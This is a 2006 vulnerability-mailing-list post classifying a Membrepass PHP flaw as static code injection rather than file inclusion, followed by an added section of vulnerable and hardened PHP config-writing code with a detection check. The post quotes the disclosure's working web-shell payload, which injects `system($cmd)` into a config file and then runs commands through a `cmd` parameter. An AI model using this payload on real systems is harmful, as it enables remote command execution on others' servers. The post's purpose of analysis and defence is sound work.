[VIM] membrepass PHP execution issue probably isn't file inclusion
Steven M. Christey
coley at mitre.org
Fri Sep 1 16:05:17 EDT 2006
Ref:
BUGTRAQ:20060831 Membrepass v1.5 Php code execution, Xss, Sql Injection
URL:http://www.securityfocus.com/archive/1/archive/1/444845/100/0/threaded
This is being referred to as file inclusion by some people, but it's
what CVE is calling "direct static code injection" (though I'll
probably drop the "direct" soon).
That's the term we use for when a product accepts user input and
inserts it directly into an executable PHP file that the product uses,
normally for configuration variables.
The relevant exploit from the original disclosure is:
GET /include/change.php
DATA ainfo="; $cmd = $_GET['cmd']; system($cmd); exit;
The ainfo parameter isn't getting a URL, so that should be a tip that
it's not file inclusion.
Then you have a direct request:
http://.../include/variable.php?cmd=dir POST
... which is probably the file that the code is being inserted into.
- Steve
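To make the class Steve describes concrete, here is an added example (not Membrepass code, and not from the advisory): a hypothetical "save settings" script that splices a posted value into a PHP config file, next to a hardened version and a review-time check. The file path, the `ainfo` variable name and the function names are assumptions.

```php
<?php
// Vulnerable pattern (assumed, for illustration): the raw value is
// concatenated into PHP source. Anything that closes the string literal
// is parsed as PHP the next time the config file is included, which is
// what "direct static code injection" means.
function write_config_vulnerable(string $path, string $ainfo): void
{
    $src = "<?php\n\$ainfo = \"" . $ainfo . "\";\n";
    file_put_contents($path, $src);
}

// Hardened pattern: var_export() emits a correctly quoted and escaped PHP
// string literal, so the value can only ever be data, never statements.
// An allow-list on the value's shape narrows what can land in the file.
function write_config_hardened(string $path, string $ainfo): void
{
    if (!preg_match('/^[A-Za-z0-9 .,_-]{0,200}$/', $ainfo)) {
        throw new InvalidArgumentException('ainfo contains disallowed characters');
    }
    $src = "<?php\n\$ainfo = " . var_export($ainfo, true) . ";\n";
    file_put_contents($path, $src, LOCK_EX);
}

// Review/monitoring check: a generated config file should contain nothing
// but scalar assignments. token_get_all() inspects the file without
// executing it, so a stray function call or array access shows up as an
// unexpected token and the check fails.
function config_has_only_scalar_assignments(string $path): bool
{
    $allowedTokens = [T_OPEN_TAG, T_VARIABLE, T_WHITESPACE,
                      T_CONSTANT_ENCAPSED_STRING, T_LNUMBER, T_DNUMBER];
    foreach (token_get_all(file_get_contents($path)) as $tok) {
        if (is_array($tok)) {
            if (!in_array($tok[0], $allowedTokens, true)) {
                return false;
            }
        } elseif ($tok !== '=' && $tok !== ';') {
            return false;
        }
    }
    return true;
}

// Example usage (assumed path outside the web root):
// write_config_hardened('/srv/app/etc/variable.php', $_POST['ainfo'] ?? '');
// var_dump(config_has_only_scalar_assignments('/srv/app/etc/variable.php'));
```

Storing settings in a non-executable format (JSON or ini) outside the web root removes the class entirely, since the config file is then never handed to the PHP parser.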